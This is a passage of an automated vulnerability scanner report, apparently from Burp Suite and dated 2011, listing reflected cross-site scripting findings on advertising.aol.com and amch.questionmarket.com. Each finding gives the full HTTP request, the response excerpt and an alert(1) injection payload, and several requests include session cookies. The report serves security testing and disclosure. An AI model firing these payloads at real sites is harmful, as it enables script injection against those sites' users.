Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/ee14a"><script>alert(1)</script>2c72c6f0042/6/3/882857095/" />
...[SNIP]...

4.93. http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/882857095/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8de4c"-alert(1)-"94a4b50c585 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8de4c"-alert(1)-"94a4b50c585/6/3/882857095/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:26 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/8de4c"-alert(1)-"94a4b50c585/6/3/882857095/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

4.94. http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/1/52531776/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8c8a"><script>alert(1)</script>3d537fa6b19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c8c8a"><script>alert(1)</script>3d537fa6b19/7/1/52531776/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/c8c8a"><script>alert(1)</script>3d537fa6b19/7/1/52531776/" />
...[SNIP]...

4.95. http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/1/52531776/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23776"-alert(1)-"cda52c37549 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /23776"-alert(1)-"cda52c37549/7/1/52531776/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/23776"-alert(1)-"cda52c37549/7/1/52531776/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertis
...[SNIP]...

4.96. http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/1777313403/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ae45"><script>alert(1)</script>6be78db95a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /5ae45"><script>alert(1)</script>6be78db95a0/7/3/1777313403/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:07 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/5ae45"><script>alert(1)</script>6be78db95a0/7/3/1777313403/" />
...[SNIP]...

4.97. http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/1777313403/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2e0c"-alert(1)-"71367095148 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e2e0c"-alert(1)-"71367095148/7/3/1777313403/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e2e0c"-alert(1)-"71367095148/7/3/1777313403/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.98. http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/1/585997419/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9666"><script>alert(1)</script>81ecfa560d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c9666"><script>alert(1)</script>81ecfa560d4/8/1/585997419/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/c9666"><script>alert(1)</script>81ecfa560d4/8/1/585997419/" />
...[SNIP]...

4.99. http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/1/585997419/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ab87"-alert(1)-"af55da2faa0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4ab87"-alert(1)-"af55da2faa0/8/1/585997419/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4ab87"-alert(1)-"af55da2faa0/8/1/585997419/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

4.100. http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/144927758/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bd70"-alert(1)-"dfbccaadf2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /5bd70"-alert(1)-"dfbccaadf2d/8/3/144927758/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/5bd70"-alert(1)-"dfbccaadf2d/8/3/144927758/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

4.101. http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/144927758/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22ce9"><script>alert(1)</script>8c28112e197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /22ce9"><script>alert(1)</script>8c28112e197/8/3/144927758/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/22ce9"><script>alert(1)</script>8c28112e197/8/3/144927758/" />
...[SNIP]...

4.102. http://amch.questionmarket.com/adscgen/d_layer.php [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4baab'%3balert(1)//ad8fd748637 was submitted in the lang parameter. This input was echoed as 4baab';alert(1)//ad8fd748637 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=4baab'%3balert(1)//ad8fd748637&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:38:46 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Content-Type: text/html
Content-Length: 12165

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
eyClickthru = 1;
}
   DL_Close(false);

window.top.location.href='http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=918801&from_node=28067&site=8&frame=&lang=4baab';alert(1)//ad8fd748637&dl_logo=&invite=no&link='+escape(window.location.href)+'&orig='+escape(window.location.href);
}

function DL_Close(adscout) {
   if (typeof adscout == 'undefined' || adscout == true) {
       DL_Adscout(adsc
...[SNIP]...

4.103. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b71a"%3balert(1)//b7312e4f877 was submitted in the site parameter. This input was echoed as 2b71a";alert(1)//b7312e4f877 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=82b71a"%3balert(1)//b7312e4f877 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:00 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Content-Type: text/html
Content-Length: 12193

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
t);
   }
   // Set a flag so animation loop will stop running
   DL_ScrollState = 2;
   DL_Scroll();
}

function DL_Adscout(adscout) {
   (new Image).src="//amch.questionmarket.com/adscgen/adscout_dc.php?site=82b71a";alert(1)//b7312e4f877&code=&survey_num=918801&ord="+Math.floor((new Date()).getTime());
}

function DL_Add(){
   DL_InsertSwf();
}

function DL_FlashInstalled() {
   // Detect swf plugin.

   var result = false;
   if (navigator.m
...[SNIP]...

4.104. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
